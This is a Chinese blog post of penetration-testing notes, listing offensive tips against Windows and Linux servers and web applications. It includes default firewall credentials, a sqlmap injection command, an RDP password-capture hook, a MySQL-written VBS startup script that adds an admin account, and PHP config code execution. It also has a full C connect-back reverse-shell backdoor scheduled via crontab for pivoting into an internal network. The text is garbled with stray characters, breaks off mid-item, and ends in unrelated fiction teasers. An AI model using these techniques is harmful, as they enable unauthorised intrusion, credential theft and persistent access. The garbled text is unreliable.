滲透筆記(2)

來(lái)源:By:xiaopiao

1誊锭、Juniper(瞻博)防火墻的默認(rèn)賬號(hào)密碼為:netscreen/netscreen

2、以下apache存在header injection漏洞:1.3.34/2.0.57/2.2.1

3捌臊、利用sqlmap進(jìn)行POST注入:./sqlmap.py -u "http://test.com/admin/test.php" --data "參數(shù)_1=a&參數(shù)_2=b" -p "參數(shù)_1"復(fù)制代碼

4粟誓、一個(gè)小技巧:面對(duì)win主機(jī)轩褐,如果發(fā)現(xiàn)目標(biāo)有被入侵過(guò)的端倪没宾,而又開(kāi)著3389,進(jìn)去試一下連敲5個(gè)Shift淫痰,人參無(wú)處不驚喜白羁!

5黑界、遇到目標(biāo)有很多個(gè)C段的情況管嬉,尋找E-mail域名所在的C段皂林,往往mail服務(wù)器所在的C段為最核心的功能段朗鸠。

6、GetHashes础倍、Pwdump烛占、WCE等工具dump不了hash?那就試試使用WinlogonHack記錄管理員登陸3389時(shí)的密碼吧沟启!下載之后將安裝程序文件Hookmsgina.dll忆家、install.bat、On.reg以及ReadLog.bat復(fù)制到一個(gè)相同文件夾下面德迹,然后在Dos提示符或者GUI界面寫(xiě)直接運(yùn)行install.bat即可芽卿。執(zhí)行完畢后不需要重啟,當(dāng)有3389登上時(shí)胳搞,自動(dòng)加載DLL卸例,并且記錄登錄密碼!管理員的登陸密碼保存在系統(tǒng)system32目錄的boot.dat文件中肌毅。

7筷转、GetHashs和saminside有些時(shí)候獲取不到Hash,可能的原因是管理員的密碼過(guò)長(zhǎng)悬而,可以使用上一條的那種方法來(lái)獲取呜舒。

8、如果能從Google搜索出一個(gè)網(wǎng)站具有黑客留下來(lái)的Webshell笨奠,那這個(gè)網(wǎng)站十有八九具有漏洞(這是廢話~~~)袭蝗,具體來(lái)說(shuō)有列目錄漏洞。因?yàn)槠渌?yè)面不可能會(huì)有鏈接鏈到Webshell的地址上般婆,所以搜索引擎的爬蟲(chóng)不會(huì)爬到Webshell呻袭,所以最大的可能就是通過(guò)列目錄漏洞暴露出Webshell的地址。

9腺兴、列目錄漏洞的利用無(wú)非幾種:Web編輯器左电、敏感文件(zip、rar、ini篓足、mdb等)段誊、upload頁(yè)面、后臺(tái)管理頁(yè)面......(歡迎留言補(bǔ)充)

10栈拖、讓win自帶的防火墻允許某個(gè)端口進(jìn)出(例如TCP 1234端口):netsh firewall set portopening TCP 1234 ENABLE復(fù)制代碼

11连舍、關(guān)閉一些危險(xiǎn)的組件,禁止webshell運(yùn)行命令:

(1)regsvr32 /u c:\windows\system32\WSHom.Ocx /s

(2)regsvr32 /u c:\windows\system32\shell32.dll /s

(3)regsvr32 /u c:\windows\system32\scrrun.dll /s復(fù)制代碼開(kāi)啟也很簡(jiǎn)單,尤其是第三個(gè)的FSO組件涩哟,很可能造成網(wǎng)站奔潰索赏,恢復(fù)的方法是regsvr32? c:\windows\system32\scrrun.dll /s復(fù)制代碼

12、在一種很極端的情況下贴彼,你實(shí)在沒(méi)有辦法了潜腻,可以嘗試一下啟動(dòng)項(xiàng)寫(xiě)入VBS腳本提權(quán)。當(dāng)然器仗,條件也十分苛刻:

(1)如果你的Webshell有足夠的權(quán)限融涣,能在用戶(hù)啟動(dòng)目錄里面寫(xiě)入文件

(2)耐心地等待管理員開(kāi)啟機(jī)子

(3)沒(méi)開(kāi)殺毒軟件我們利用Mysql來(lái)outfile出vbs腳本:create table a(cmd text);insert into a values ("set wshshell=createobject(""wscript.shell"")");insert into a values ("a=wshshell.run(""cmd.exe /c net user user password /add"",0)");insert into a values ("a=wshshell.run(""cmd.exe /c net localgroup administrators user /add"",0)");select * from a into outfile "c:\\docume~1\\alluse~1\\[開(kāi)始]菜單\\程序\\啟動(dòng)\\a.vbs";復(fù)制代碼說(shuō)明:insert into a values ("a=wshshell.run(""cmd.exe /c net user user password /add"",0)");里面的“0”意思是不彈出CMD窗口,安靜地運(yùn)行精钮。

13威鹿、PhpSpy 2013 密碼修改

(1)、將加密函數(shù):function encode_pass($pass) {? ? $k = 'angel';? ? $pass = md5($k.$pass);? ? $pass = md5($pass.$k);? ? $pass = md5($k.$pass.$k);? ? return $pass;復(fù)制代碼最后一行return $pass; 修改為 echo $pass轨香;

(2)忽你、在Login框登陸輸入你的密碼,即可輸出加密好的密碼臂容。

(3)科雳、然后在PhpSpy 2013里修改 $pass的值 就可以了。

13策橘、真實(shí)案例:滲透某站后發(fā)現(xiàn)對(duì)方規(guī)則較變態(tài)炸渡,比如執(zhí)行id,uname-a,等便可判斷為入侵。想了下丽已,通過(guò)Base64編碼繞過(guò)

命令寫(xiě)入文件的方式實(shí)現(xiàn)繞過(guò)(實(shí)際運(yùn)用中要能上傳或者寫(xiě)入文件)

還有其他很多方法蚌堵,即使不能上傳文件,也可以自己’因地制宜’`借`到執(zhí)行命令的字符后反單引號(hào)執(zhí)行沛婴。用的方法是 linux Shell expr linux Shell expr可以參考

http://blog.csdn.net/junjieguo/article/details/729362214吼畏、滲透某站過(guò)程中,進(jìn)了后臺(tái)拿不到shell嘁灯,后臺(tái)配置文件可寫(xiě)泻蚊,便下了源碼研究。

具體代碼:$config["db"]["pass"] = "";$config["db"]["data"] = "phpok";$config["db"]["prefix"] = "

可寫(xiě)入的數(shù)據(jù)";$config["db"]["debug"] = false;

復(fù)制代碼大膽地提交{${phpinfo()}}訪問(wèn)配置文件丑婿,php代碼被解析執(zhí)行了性雄。

原理是php雙引號(hào)的解析執(zhí)行没卸,很多開(kāi)源程序后臺(tái)都可用這個(gè)拿shell喔。

Php雙引號(hào)解析執(zhí)行詳見(jiàn):http://www.myhack58.com/Article/html/3/68/2013/36620.htm15秒旋、遇到可修改模板的地方约计,看能否修改模板為php后綴,若不行迁筛,考慮畸形文件名煤蚌?

如.php.apk。apache是依舊當(dāng)做PHP執(zhí)行的细卧。

服務(wù)器解析漏洞詳見(jiàn) http://drops.wooyun.org/papers/53916尉桩、曾經(jīng)搞一個(gè)站的后臺(tái),成功修改模板為.php后綴贪庙,但內(nèi)容過(guò)濾了PHP標(biāo)簽phpinfo() ;

復(fù)制代碼成功寫(xiě)入并解析蜘犁,done.17、reDuh插勤,一個(gè)不錯(cuò)的工具沽瘦,可以映射內(nèi)網(wǎng)端口到http或https端口的http服務(wù)上:服務(wù)端有aps革骨、jsp农尖、php版,具體下載:

http://www.sensepost.com/research/reDuh良哲。

下面簡(jiǎn)單說(shuō)下這個(gè)工具先在服務(wù)器上傳服務(wù)端:訪問(wèn)http://www.xxx.com/shell/reduh.jsp

如下:[reDuhError]Undefined Request說(shuō)明工作正常盛卡。

在本地:D:\Tools\reDuh\0.2\reDuhClient>java reDuhClient www.xxx.com 80 /shell/reduh.jsp[Info]Querying remote JSP for usable remote RPC port[Info]Remote RPC port chosen as 42001[Info]Attempting to start reDuh.jsp from www.xxx.com:80/shell/reduh.jsp and setting remote RPC port to 42001. Please wait…[InfoL]reDuhClient service listener started on local port 1010[InfoL]Caught new service connection on port 1010

本地默認(rèn)監(jiān)聽(tīng)1010端口:D:\Tools>nc -vv 127.0.0.1 1010DNS fwd/rev mismatch: localhost != vitterlocalhost [127.0.0.1] 1010 (?) openWelcome to the reDuh command line>>[createTunnel]5900:192.168.0.3:5900Successfully bound locally to port 5900. Awaiting connections.出現(xiàn)這個(gè)提示就ok了,[createTunnel]

本地映射出的端口:被映射的內(nèi)網(wǎng)ip:被映射的內(nèi)網(wǎng)ip端口然后就可以用vnc連接127.0.0.1的5900端口就是連攻擊內(nèi)網(wǎng)的192.168.0.3的服務(wù)器了筑凫。

18滑沧、如何在webshell反彈后門(mén)回來(lái)后停止apache:由 python -c ’import pty; pty.spawn(“/bin/sh”)’得到一個(gè)可以交互的shell,在有root密碼的前提下可 以su巍实,但是發(fā)現(xiàn)不能停止httpd滓技,因?yàn)檫@個(gè)shell的父進(jìn)程是httpd的,如果httpd被stop后棚潦,發(fā)現(xiàn)后門(mén)直接就掛了令漂。可以crond去跑 這個(gè)后門(mén)得到shell不要用webshell跑丸边,在這個(gè)shell里面停止httpd(因?yàn)樵搩?nèi)網(wǎng)服務(wù)器段只被映射這一個(gè)ip的80端口出來(lái)叠必,現(xiàn)在這個(gè) 80端口要做內(nèi)網(wǎng)映射到網(wǎng)關(guān)上,可以直接遠(yuǎn)程管理設(shè)備妹窖,開(kāi)DMZ之后入侵其他內(nèi)網(wǎng)服務(wù)器)纬朝。本地:nc -l -p 5555服務(wù)器上:[root@cactiez etc]#cat /home/www/haha.c—————————-代碼開(kāi)始分割線—————————–#include#include#include#include#include#include#includeint fd, sock;int port = 5555;struct sockaddr_in addr;char mesg[]? = ”::Connect-Back Backdoor:: CMD: ”;char shell[] = ”/bin/sh”;int main(int argc, char *argv[]) {while(argc<2) {? fprintf(stderr, ” %s”, argv[0]);

exit(0); }

addr.sin_family = AF_INET;

addr.sin_port = htons(port);

addr.sin_addr.s_addr = inet_addr(argv[1]);

fd = socket(AF_INET, SOCK_STREAM, 0);

connect(fd, (struct sockaddr*)&addr, sizeof(addr));

send(fd, mesg, sizeof(mesg), 0);

dup2(fd, 0);

dup2(fd, 1);

dup2(fd, 2);

execl(shell, ”in.telnetd”, 0);

close(fd);return 1;

}

復(fù)制代碼

—————————-代碼結(jié)束分割線—————————–

[root@cactiez etc]# gcc -o /bin/haha /home/www/haha.c

[root@cactiez etc]# mkdir /etc/cr_m

[root@cactiez etc]# cp /home/www/si /etc/cr_m/

[root@cactiez etc]# chmod +x /etc/cr_m/si

[root@cactiez etc]# cat /etc/cr_m/si #!/bin/sh/bin/haha xxx.xxx.xxx.xx

[root@cactiez etc]# echo ”*/1 * * * * root run-parts /etc/cr_m” >> /etc/crontab? #追加一個(gè)crontab每分鐘執(zhí)行

[root@cactiez etc]# cat /etc/crontabSHELL=/bin/bashPATH=/sbin:/bin:/usr/sbin:/usr/binMAILTO=rootHOME=/# run-parts01 * * * * root run-parts /etc/cron.hourly02 4 * * * root run-parts /etc/cron.daily22 4 * * 0 root run-parts /etc/cron.weekly42 4 1 * * root run-parts /etc/cron.monthly*/1 * * * * root run-parts /etc/cr_m

1分鐘后本地nc監(jiān)聽(tīng)的就連上了,然后在這個(gè)里面停止httpd:

[root@cactiez etc]# cat /root/s.sh#!/bin/sh/sbin/service httpd stop/usr/local/bin/proxy 80 192.168.0.1 80sleep 600killall -9 proxy/sbin/service httpd restart

[root@cactiez etc]# /root/s.sh &

現(xiàn)在連接這機(jī)器的公網(wǎng)ip的80端口就已經(jīng)是網(wǎng)關(guān)192.168.0.1的80端口了骄呼,趕緊的設(shè)置DMZ共苛,搞定內(nèi)網(wǎng)機(jī)器判没。

19、曾經(jīng)搞一個(gè)站 無(wú)XSS 無(wú)SQL注入隅茎,只開(kāi)放80端口哆致。用戶(hù)只能上傳圖片文件。有個(gè)物理路徑報(bào)錯(cuò)患膛。

運(yùn)氣好看到了cookie有一個(gè)

language=en

推測(cè)是否服務(wù)端的代碼為

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末摊阀,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子踪蹬,更是在濱河造成了極大的恐慌胞此,老刑警劉巖,帶你破解...
    沈念sama閱讀 217,406評(píng)論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件跃捣,死亡現(xiàn)場(chǎng)離奇詭異漱牵,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)疚漆,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,732評(píng)論 3 393
  • 文/潘曉璐 我一進(jìn)店門(mén)酣胀,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人娶聘,你說(shuō)我怎么就攤上這事闻镶。” “怎么了丸升?”我有些...
    開(kāi)封第一講書(shū)人閱讀 163,711評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵铆农,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我狡耻,道長(zhǎng)墩剖,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,380評(píng)論 1 293
  • 正文 為了忘掉前任夷狰,我火速辦了婚禮岭皂,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘沼头。我一直安慰自己爷绘,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,432評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布瘫证。 她就那樣靜靜地躺著揉阎,像睡著了一般。 火紅的嫁衣襯著肌膚如雪背捌。 梳的紋絲不亂的頭發(fā)上毙籽,一...
    開(kāi)封第一講書(shū)人閱讀 51,301評(píng)論 1 301
  • 那天,我揣著相機(jī)與錄音毡庆,去河邊找鬼坑赡。 笑死烙如,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的毅否。 我是一名探鬼主播亚铁,決...
    沈念sama閱讀 40,145評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼螟加!你這毒婦竟也來(lái)了徘溢?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 39,008評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤捆探,失蹤者是張志新(化名)和其女友劉穎然爆,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體黍图,經(jīng)...
    沈念sama閱讀 45,443評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡曾雕,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,649評(píng)論 3 334
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了助被。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片剖张。...
    茶點(diǎn)故事閱讀 39,795評(píng)論 1 347
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖揩环,靈堂內(nèi)的尸體忽然破棺而出搔弄,到底是詐尸還是另有隱情,我是刑警寧澤检盼,帶...
    沈念sama閱讀 35,501評(píng)論 5 345
  • 正文 年R本政府宣布肯污,位于F島的核電站翘单,受9級(jí)特大地震影響吨枉,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜哄芜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,119評(píng)論 3 328
  • 文/蒙蒙 一貌亭、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧认臊,春花似錦圃庭、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,731評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至涂屁,卻和暖如春书在,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背拆又。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,865評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工儒旬, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留栏账,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 47,899評(píng)論 2 370
  • 正文 我出身青樓栈源,卻偏偏與公主長(zhǎng)得像挡爵,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子甚垦,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,724評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容